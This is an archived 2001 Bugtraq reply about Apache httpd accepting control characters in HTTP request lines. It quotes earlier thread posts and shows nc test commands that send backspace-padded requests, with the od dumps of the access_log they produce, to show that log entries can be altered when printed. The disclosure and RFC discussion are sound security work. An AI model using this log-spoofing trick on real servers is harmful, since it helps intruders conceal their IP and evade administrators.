[18412] in bugtraq
Re: Securax Advisory 12
daemon@ATHENA.MIT.EDU (Alex Muntada)
Wed Jan 3 12:13:36 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20010103122203.C2576@ac.upc.es>
Date: Wed, 3 Jan 2001 12:22:03 +0100
Reply-To: Alex Muntada <alexm@AC.UPC.ES>
From: Alex Muntada <alexm@AC.UPC.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <001101c07402$585fbdc0$8656e0d5@pandora.be>; from
incubus@SECURAX.ORG on Mon, Jan 01, 2001 at 03:51:38PM +0100
incubus wrote:
> When the backspace charachter is sent, after a NULL terminated
> request, we will get a answer, the page we requested, but our
> entry in the access_log file is kinda altered. We can overwrite
> our IP address when someone wantsto cat the logfile to the
> screen or maybe also to a device (such as: > /dev/lp0),
NUL terminaded request aside, the backspace (and any other
control characters) logging in httpd logs had been discussed some
time ago, as you can see below --for details, see Bugtraq archives
http://www.securityfocus.com/archive/1/11840
mnemonix wrote:
> The problem relates to "allowable" REQUEST_METHODs when a dynamic
> resource, such as a CGI script is requested. Essentially _any_
> (except for HEAD, TRACE and OPTIONS) REQUEST_METHOD can be used -
> even methods not defined in the HTTP protocol. Consider the
> following requests which all return the requested resource.
>
> GET /cgi-bin/environ.cgi HTTP/0.9
>
> Azx5T8uHTRuDL /cgi-bin/environ.cgi HTTP/1.0
>
> Even Control characters are allowed. Consider the following:
>
> ^H^H^H^H^H^H^H^H^H lots of these ^H^H /cgi-bin/environ.cgi HTTP/1.1
Sevo Stille wrote:
> Of course control chars are and must be allowed - CGI is defined
> to be transparent towards the application. For a request
> satisfied by the server, the server would have to (and at any
> rate apache does) return a 501 method not implemented error,
> according to the specs, par. 5.1.1.1
Henrik Nordstrom wrote:
> Not really. RFC 2068 defines method as a token, which is "1*<any
> CHAR except CTLs or tspecials>" so the above may be rejected with a
> "400 Bad Request" reply as it is not valid HTTP syntax.
>
> HTTP puts restrictions on wich characters that are allowable in
> all parts of the protocol except the message body.
So does apply to entire Request-Line and Simple-Request (as
depicted in the Securax advisory).
Tested Apache 1.3.14 (source compiled httpd) and it still accepts
control chars in HTTP requests, but it shouldn't as pointed by
Henrik Nordstrom.
Just a last comment on kosheen.c: on my tests against apache, it
seems to discard anything after NUL byte, so kosheen doesn't work
as expected unless NUL is removed:
% cat <<EOF | nc www.example.com 80
GET /index.html HTTP/1.0^@^H^H^H^H
EOF
....HTML....
% tail -1 access_log | od -c
0000000 w w w . e x a m p l e . c o m
0000020 - - [ 0 3 / J a n / 2 0 0 1
0000040 : 1 1 : 4 5 : 1 4 + 0 1 0 0 ]
0000060 " G E T / i n d e x . h t m
0000100 l H T T P / 1 . 0 " 2 0 0
0000140 4 8 5 9 - - \n
% cat <<EOF | nc www.example.com 80
GET /index.html HTTP/1.0^H^H^H^H
EOF
....HTML....
% tail -1 access_log | od -c
0000000 w w w . e x a m p l e . c o m
0000020 - - [ 0 3 / J a n / 2 0 0 1
0000040 : 1 1 : 4 5 : 1 4 + 0 1 0 0 ]
0000060 " G E T / i n d e x . h t m
0000100 l H T T P / 1 . 0 \b \b \b \b "
0000140 2 0 0 4 8 5 9 - - \n
Best,
Alex
--
Alex Muntada <alexm@ac.upc.es>
http://www.ac.upc.es/homes/alexm/
